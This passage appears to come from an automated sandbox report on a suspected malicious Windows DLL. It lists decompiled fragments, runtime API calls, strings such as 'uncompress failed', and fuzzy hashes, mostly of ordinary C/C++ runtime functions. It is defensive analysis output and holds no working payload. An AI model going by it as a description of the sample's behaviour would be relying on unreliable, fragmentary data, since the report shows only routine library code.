				if(_v20 != _v24) {
					_push("if (origSize != out_len)");
					E6EDB2B80(_t91);
					_t87 = _t87 + 4;
					E6EE3AAA4(1);
				}
				E6EDB34C0( &_v112, _t91, _v28, _v24); // executed
				_v8 = 2;
				E6EE3ACC7(_v28); // executed
				E6EDCC170(_a4,  &_v112);
				_v32 = _v32 | 0x00000001;
				_v8 = 1;
				_t56 = E6EDCC420( &_v112);
				_v8 = 0;
				E6EDB1DC0(_t56,  &_v44);
				_v8 = 0xffffffff;
				E6EDB1D80( &_v68); // executed
				 *[fs:0x0] = _v16;
				return _a4;
			}

0x6edce7b3
0x6edce7b5
0x6edce7c0
0x6edce7c1
0x6edce7cb
0x6edce7d5
0x6edce7da
0x6edce7e8
0x6edce7ed
0x6edce7f8
0x6edce804
0x6edce80c
0x6edce80d
0x6edce815
0x6edce81b
0x6edce821
0x6edce838
0x6edce83d
0x6edce840
0x6edce842
0x6edce844
0x6edce849
0x6edce84e
0x6edce853
0x6edce853
0x6edce85b
0x6edce85e
0x6edce860
0x6edce865
0x6edce86a
0x6edce86f
0x6edce86f
0x6edce87f
0x6edce884
0x6edce88c
0x6edce89b
0x6edce8a6
0x6edce8a9
0x6edce8b0
0x6edce8b5
0x6edce8bc
0x6edce8c1
0x6edce8cb
0x6edce8d6
0x6edce8e0

APIs

Part of subcall function 6EDB1ED0: task.LIBCPMTD ref: 6EDB1EF7

~.LIBCPMTD ref: 6EDCE8B0
task.LIBCPMTD ref: 6EDCE8CB

Part of subcall function 6EDB2B80: __vfwprintf_l.LIBCONCRTD ref: 6EDB2BA1

Strings

if (origSize != out_len), xrefs: 6EDCE860
uncompress failed, xrefs: 6EDCE844

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: task$__vfwprintf_l
String ID: if (origSize != out_len)$uncompress failed
API String ID: 3740486980-1470903686
Opcode ID: 8d2cc03f2a39bf93748292b06cf2083c373bd8a84222400507fc32fcf96be139
Instruction ID: f1cc312c190bdf069a3d964173308e0bb18ca3f198d726a28ba05096f7288bdf
Opcode Fuzzy Hash: 8d2cc03f2a39bf93748292b06cf2083c373bd8a84222400507fc32fcf96be139
Instruction Fuzzy Hash: 2D316FB2D00109DBCF04DFD4C851BEEB77CBF54258F144918E516AB280EB346A49CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6EE40EDF, Relevance: 4.6, APIs: 3, Instructions: 141COMMON

Download Yara Rule

APIs

Part of subcall function 6EE444CA: GetLastError.KERNEL32(?,?,?,6EE3ACF2,6EDB2A9E,?,?,?,?,?,6EDB2A5D,?,?,?,6EDB28E8,?), ref: 6EE444CF
Part of subcall function 6EE444CA: SetLastError.KERNEL32(00000000,00000007,000000FF,?,?,?,6EE3ACF2,6EDB2A9E,?,?,?,?,?,6EDB2A5D,?,?), ref: 6EE4456D

_free.LIBCMT ref: 6EE40F8E
_free.LIBCMT ref: 6EE40FBC
_free.LIBCMT ref: 6EE40FFF

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorLast
String ID:
API String ID: 3291180501-0
Opcode ID: 6c73f28ce2c039810ab31661d86478aca056d14635c13bdb9f32676971b2c1a0
Instruction ID: d88c838fa3fe08efdba57f2967b691be4cd9c5ef8b457c9ea186f8320b12a125
Opcode Fuzzy Hash: 6c73f28ce2c039810ab31661d86478aca056d14635c13bdb9f32676971b2c1a0
Instruction Fuzzy Hash: 3E417C31610106DFDB55CFECD890AAAB3F8EF59358B340A6DE455C7394EB31E8209B50

Uniqueness

Uniqueness Score: -1.00%

Function 6EE4103E, Relevance: 4.6, APIs: 3, Instructions: 96COMMON

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 6EE4106A
__cftoe.LIBCMT ref: 6EE4109C
_free.LIBCMT ref: 6EE410C2

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: __cftoe$_free
String ID:
API String ID: 1303422935-0
Opcode ID: b389f3531f1f1ab55fd0ac881678f575e58eaaa6f88dad6f4da9cc3aec6ef97b
Instruction ID: cc89b7f8ba25bcc6afd3fdfefdfbe26cfa9738659098ee5fda9b6493ade61eec
Opcode Fuzzy Hash: b389f3531f1f1ab55fd0ac881678f575e58eaaa6f88dad6f4da9cc3aec6ef97b
Instruction Fuzzy Hash: 0821D872904149FACF269BD5AC41EDF3BECDF85224F30452BF924D6294EB30C658CA91

Uniqueness

Uniqueness Score: -1.00%

Function 6EDB2A40, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

std::locale::facet::facet.LIBCPMTD ref: 6EDB2A6D

Part of subcall function 6EE37B80: RaiseException.KERNEL32(E06D7363,00000001,00000003,6EE370C5,?,?,?,6EE370C5,?,6EE67E9C), ref: 6EE37BE0

Strings

#44, xrefs: 6EDB2A65

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionRaisestd::locale::facet::facet
String ID: #44
API String ID: 1247307126-1607739113
Opcode ID: 596bc70fd53759f25efababfe2aca6d63ef5c305f054dabb52ddf11dc29f1999
Instruction ID: d248e7dd3470ded81cbd9c3bb9d2227c968d328c09494cc89be56385a8f7e1c2
Opcode Fuzzy Hash: 596bc70fd53759f25efababfe2aca6d63ef5c305f054dabb52ddf11dc29f1999
Instruction Fuzzy Hash: 20E092B291411DBB8B04DBE4CC50EFFB77CAE44204F10899DE416A7280FB31A618C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 6EDB3230, Relevance: 3.1, APIs: 2, Instructions: 97COMMON

Download Yara Rule

APIs

Part of subcall function 6EDB2990: _Max_value.LIBCPMTD ref: 6EDB29BC
Part of subcall function 6EDB2990: _Min_value.LIBCPMTD ref: 6EDB29E2

allocator.LIBCONCRTD ref: 6EDB3293
allocator.LIBCONCRTD ref: 6EDB3302

Part of subcall function 6EDB2490: std::_Xinvalid_argument.LIBCPMT ref: 6EDB2498

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: allocator$Max_valueMin_valueXinvalid_argumentstd::_
String ID:
API String ID: 3868691235-0
Opcode ID: 0096af6fc34ffa91af832f778a2d716f694a4d4877f5d4494ae72fb32922d038
Instruction ID: df31af9331993348991ba20dea9c6aa2aa0e7068567ae3da369b52a5ce16a277
Opcode Fuzzy Hash: 0096af6fc34ffa91af832f778a2d716f694a4d4877f5d4494ae72fb32922d038
Instruction Fuzzy Hash: 574186B5D00109EFCB08DFD9D9909EEB7B9BF48308F248559E516A7350EB30AE41DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6EDB3640, Relevance: 3.1, APIs: 2, Instructions: 79COMMON

Download Yara Rule

APIs

_Min_value.LIBCPMTD ref: 6EDB36C0
allocator.LIBCONCRTD ref: 6EDB36D7

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: Min_valueallocator
String ID:
API String ID: 2162267568-0
Opcode ID: cb6885b4dbb1ee9551cfb46cf8f0d3cc12a3f9dc934340e6adac065c151ab22a
Instruction ID: d2962a56be60d9cbc8cc127596a55d5799df8809b5958a1ffd28f60dc2184b9f
Opcode Fuzzy Hash: cb6885b4dbb1ee9551cfb46cf8f0d3cc12a3f9dc934340e6adac065c151ab22a
Instruction Fuzzy Hash: 1231D8B5D00209EFCB08CFD4D9909EEBBB9BF48308F104959D516AB341E730AA45DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 6EE368AE, Relevance: 3.1, APIs: 2, Instructions: 76COMMON

Download Yara Rule

APIs

__RTC_Initialize.LIBCMT ref: 6EE368FB

Part of subcall function 6EE37334: InitializeSListHead.KERNEL32(6EE78F18,6EE36905,6EE686A8,00000010,6EE36896,?,?,?,6EE36ABE,?,00000001,?,?,00000001,?,6EE686F0), ref: 6EE37339

___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6EE36965

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
String ID:
API String ID: 3231365870-0
Opcode ID: eb654a768df4d4ae07a7d2e24c8e447c72085b5e35e0950246cc161955e40913
Instruction ID: 9ea01bb02b11b79b66f2a197cc6648dfc0e4a59b968fdb4bfd6e62ae27718219
Opcode Fuzzy Hash: eb654a768df4d4ae07a7d2e24c8e447c72085b5e35e0950246cc161955e40913
Instruction Fuzzy Hash: 3C21FA322782739AEF00EBF8A9003DD7BA69F1622DF30485DD8802B3C0CB725064C666

Uniqueness

Uniqueness Score: -1.00%

Function 6EDB14F0, Relevance: 3.1, APIs: 2, Instructions: 69COMMON

Download Yara Rule

APIs

Part of subcall function 6EDB2990: _Max_value.LIBCPMTD ref: 6EDB29BC
Part of subcall function 6EDB2990: _Min_value.LIBCPMTD ref: 6EDB29E2

allocator.LIBCONCRTD ref: 6EDB1538
allocator.LIBCONCRTD ref: 6EDB158D

Part of subcall function 6EDB2490: std::_Xinvalid_argument.LIBCPMT ref: 6EDB2498

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: allocator$Max_valueMin_valueXinvalid_argumentstd::_
String ID:
API String ID: 3868691235-0
Opcode ID: 09eec5c0a034c05a7c1559dab13cf6c71817223b74b27936ba74818878c49b92
Instruction ID: 9a65e7c1d0bbedb25857ea26949fde1e99a3911a3960f35e68fbda69f7bf9283
Opcode Fuzzy Hash: 09eec5c0a034c05a7c1559dab13cf6c71817223b74b27936ba74818878c49b92
Instruction Fuzzy Hash: C221CDB5D00109EFCB04DFD8D9919DEB7B9BF48344B104599E416A7350EB30AF44DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6EDB2870, Relevance: 3.1, APIs: 2, Instructions: 53COMMON

Download Yara Rule

APIs

Part of subcall function 6EDB2A40: std::locale::facet::facet.LIBCPMTD ref: 6EDB2A6D

task.LIBCPMTD ref: 6EDB2904
task.LIBCPMTD ref: 6EDB2913

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: task$std::locale::facet::facet
String ID:
API String ID: 3668245285-0
Opcode ID: a26fc793bfd08d5b8d540fe38c3bb545ada3ae44d20419e8d86ac9b5691d0d5b
Instruction ID: 221b213318d465469cb877da11d50598a2346c01d4bd8ce990caf541a0dfd30a
Opcode Fuzzy Hash: a26fc793bfd08d5b8d540fe38c3bb545ada3ae44d20419e8d86ac9b5691d0d5b
Instruction Fuzzy Hash: F6112BB1D01149EBCB04DFD4D950BEEBBB9FF44354F204969E42667390EB346A08CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6EDB23A0, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

allocator.LIBCONCRTD ref: 6EDB2405

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: allocator
String ID:
API String ID: 3447690668-0
Opcode ID: 011d305c28b58042645ee62b660e219c0e125813ab123e776b525b423f8ab133
Instruction ID: 5f647de32cfd2577b111a0f91e37baad5be30dabfabc696b2aed759e124b3eaa
Opcode Fuzzy Hash: 011d305c28b58042645ee62b660e219c0e125813ab123e776b525b423f8ab133
Instruction Fuzzy Hash: 981130B5D0010A9BDB04DFD4D951BBFB7B9EB44308F204568D506AB781EB35AA01CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 6EE46754, Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

Part of subcall function 6EE447A4: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6EE4466C,00000001,00000364,00000007,000000FF,?,00000000,?,6EE42017,6EE44799), ref: 6EE447E5

_free.LIBCMT ref: 6EE46774

Part of subcall function 6EE4471C: RtlFreeHeap.NTDLL(00000000,00000000,?,6EE5124B,?,00000000,?,?,?,6EE514EE,?,00000007,?,?,6EE4EB20,?), ref: 6EE44732
Part of subcall function 6EE4471C: GetLastError.KERNEL32(?,?,6EE5124B,?,00000000,?,?,?,6EE514EE,?,00000007,?,?,6EE4EB20,?,?), ref: 6EE44744

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocateErrorFreeLast_free
String ID:
API String ID: 314386986-0
Opcode ID: 30a363d8e55ef13a8efff0317176e0ecb88c67072bdcdb5b1073a3bb0e8fc231
Instruction ID: 30cf7165eb4d31bc5fe9272a939aa64ea2f3d01da0bbde7d09b1e1fc902d83f0
Opcode Fuzzy Hash: 30a363d8e55ef13a8efff0317176e0ecb88c67072bdcdb5b1073a3bb0e8fc231
Instruction Fuzzy Hash: 1B010CB6E00619AFCB40DFA5D441ADEBBF8FB48714F10452AE914E7340E774A655CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 6EDD0F90, Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

std::_Locinfo::~_Locinfo.LIBCPMTD ref: 6EDD1001

Part of subcall function 6EDD13E0: _Yarn.LIBCPMTD ref: 6EDD13FB

Part of subcall function 6EDD0560: std::_Lockit::_Lockit.LIBCPMT ref: 6EDD056C
Part of subcall function 6EDD0560: _Yarn.LIBCPMTD ref: 6EDD0577
Part of subcall function 6EDD0560: _Yarn.LIBCPMTD ref: 6EDD0582
Part of subcall function 6EDD0560: _Yarn.LIBCPMTD ref: 6EDD058D
Part of subcall function 6EDD0560: _Yarn.LIBCPMTD ref: 6EDD0598
Part of subcall function 6EDD0560: _Yarn.LIBCPMTD ref: 6EDD05A3
Part of subcall function 6EDD0560: _Yarn.LIBCPMTD ref: 6EDD05AE
Part of subcall function 6EDD0560: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6EDD05C1

Part of subcall function 6EDD0500: std::bad_exception::bad_exception.LIBCMTD ref: 6EDD050E
Part of subcall function 6EDD0500: ctype.LIBCPMTD ref: 6EDD0523

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: Yarn$std::_$LocinfoLocinfo::_Locinfo::~_Locinfo_ctorLockitLockit::_ctypestd::bad_exception::bad_exception
String ID:
API String ID: 4070494121-0
Opcode ID: 83044c616c0b49aaf1f5a2599221c47667459d41ae798ce6304b8c5832de34d2
Instruction ID: d27b6763ead6f5b56bf7db54706cf070e932273f7b3d6578a195928b611c465e
Opcode Fuzzy Hash: 83044c616c0b49aaf1f5a2599221c47667459d41ae798ce6304b8c5832de34d2
Instruction Fuzzy Hash: B8011A7094020DEBDB40DFE4C856BEEB775EB40345F2081A8D8166B290EB759A49CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6EDB2A90, Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

task.LIBCPMTD ref: 6EDB2AE3

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: task
String ID:
API String ID: 1384045349-0
Opcode ID: cfa3e00e6516195de070d8b3fbfa6c58c4495ab571f1e9cecdc6b197ad80c6fd
Instruction ID: 2a0fd5927d3e1313dff006a9a082c715371491a117c198aff6aad126fd6db25c
Opcode Fuzzy Hash: cfa3e00e6516195de070d8b3fbfa6c58c4495ab571f1e9cecdc6b197ad80c6fd
Instruction Fuzzy Hash: A311C575A00248EFCB04CFA8C9909DDB7B5BF49304F208599E8169B350D731AE40DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 6EE447A4, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6EE4466C,00000001,00000364,00000007,000000FF,?,00000000,?,6EE42017,6EE44799), ref: 6EE447E5

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 3450e466e2650fa89d2e0fb627b040c2ed44daafd17815e8ad31cd5fb186dd1c
Instruction ID: 2e61b8c5ac524826fb45aef82c5964b3e7816a52555515aa0035c78438bcf198
Opcode Fuzzy Hash: 3450e466e2650fa89d2e0fb627b040c2ed44daafd17815e8ad31cd5fb186dd1c
Instruction Fuzzy Hash: 95F0BB32355626DEEB515EE6BC48E46378CDF437A4F314113E814EB584CF21D90385A0

Uniqueness

Uniqueness Score: -1.00%

Function 6EE36113, Relevance: 1.5, APIs: 1, Instructions: 38COMMON

Download Yara Rule

APIs

stdext::threads::lock_error::lock_error.LIBCPMTD ref: 6EE370B2

Part of subcall function 6EE37B80: RaiseException.KERNEL32(E06D7363,00000001,00000003,6EE370C5,?,?,?,6EE370C5,?,6EE67E9C), ref: 6EE37BE0

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionRaisestdext::threads::lock_error::lock_error
String ID:
API String ID: 3447279179-0
Opcode ID: 4c129be82d2f4a165d8ce8b3f032eef6926c8cf0de80aaab5d8cfbebbe65b605
Instruction ID: 9e77d970155ed349fb4668a859a92d99800ae867dbd049c8f38c1ac2a0d20e7c
Opcode Fuzzy Hash: 4c129be82d2f4a165d8ce8b3f032eef6926c8cf0de80aaab5d8cfbebbe65b605
Instruction Fuzzy Hash: 54F0B47084021FBBCB04ABF9EC649EE777C5900258F704628A828961D1FF70D659C5D0

Uniqueness

Uniqueness Score: -1.00%

Function 6EDB1390, Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMTD ref: 6EDB13A7

Part of subcall function 6EDB2380: stdext::threads::lock_error::lock_error.LIBCPMTD ref: 6EDB2389

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: Concurrency::cancel_current_taskstdext::threads::lock_error::lock_error
String ID:
API String ID: 2103942186-0
Opcode ID: c2f46a631e376d9ab501e16b11ecc234a5f6b27116b92b75c6625e3be690b817
Instruction ID: 41752e8f61ab5195cab75d4c593e2c6aa8710acecf2ea65eb59f7c06b500a39d
Opcode Fuzzy Hash: c2f46a631e376d9ab501e16b11ecc234a5f6b27116b92b75c6625e3be690b817
Instruction Fuzzy Hash: 03F03CB4D04108EBCB44DFE8D581A9DB7B5AF44308F1081A9D8169B788F7309A44CB81

Uniqueness

Uniqueness Score: -1.00%

Function 6EE44756, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000000,?,?,6EE3612D,00000000,?,6EDB211C,00000000,?,6EDB1379,00000000), ref: 6EE44788

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 1f8d8b2d3dcaa43327d27f0523db63b09464678bb8b99aae3a878dd6391a4f58
Instruction ID: 546feecf5d2ba4af64f636a7f46ceb5e3973381a023e15f0c47eb5801d8075f1
Opcode Fuzzy Hash: 1f8d8b2d3dcaa43327d27f0523db63b09464678bb8b99aae3a878dd6391a4f58
Instruction Fuzzy Hash: 72E0E531394622DAFB511EE57C08F86368C9F532B8F310122EC54D72C0CB61DA0381E0

Uniqueness

Uniqueness Score: -1.00%

Function 6EDD1C30, Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 6EDD03F0: std::_Lockit::_Lockit.LIBCPMT ref: 6EDD03FB
Part of subcall function 6EDD03F0: int.LIBCPMTD ref: 6EDD040D
Part of subcall function 6EDD03F0: std::_Lockit::~_Lockit.LIBCPMT ref: 6EDD04A6

ctype.LIBCPMTD ref: 6EDD1C55

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_ctype
String ID:
API String ID: 2260400482-0
Opcode ID: 779ed65c3b8d96110a4d650fd30b6dbcd40bdac55f40f4ff1adf67c454f01e70
Instruction ID: 27e6005fa8ffdfcd7b9aaca9b6102b8e1e0d658fc9420a9caafd244611fe385f
Opcode Fuzzy Hash: 779ed65c3b8d96110a4d650fd30b6dbcd40bdac55f40f4ff1adf67c454f01e70
Instruction Fuzzy Hash: B7E0DFB5C0818C26CF04EBF898208FFBF3C9A15184F000AA9E84117242EA31662CC7B5

Uniqueness

Uniqueness Score: -1.00%

Function 6EDB1ED0, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

Part of subcall function 6EDB2870: task.LIBCPMTD ref: 6EDB2904
Part of subcall function 6EDB2870: task.LIBCPMTD ref: 6EDB2913

task.LIBCPMTD ref: 6EDB1EF7

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: task
String ID:
API String ID: 1384045349-0
Opcode ID: 742e398ef474c4288a5d5449e1c5913801b3e3beac6dc4b3ac387022e504948f
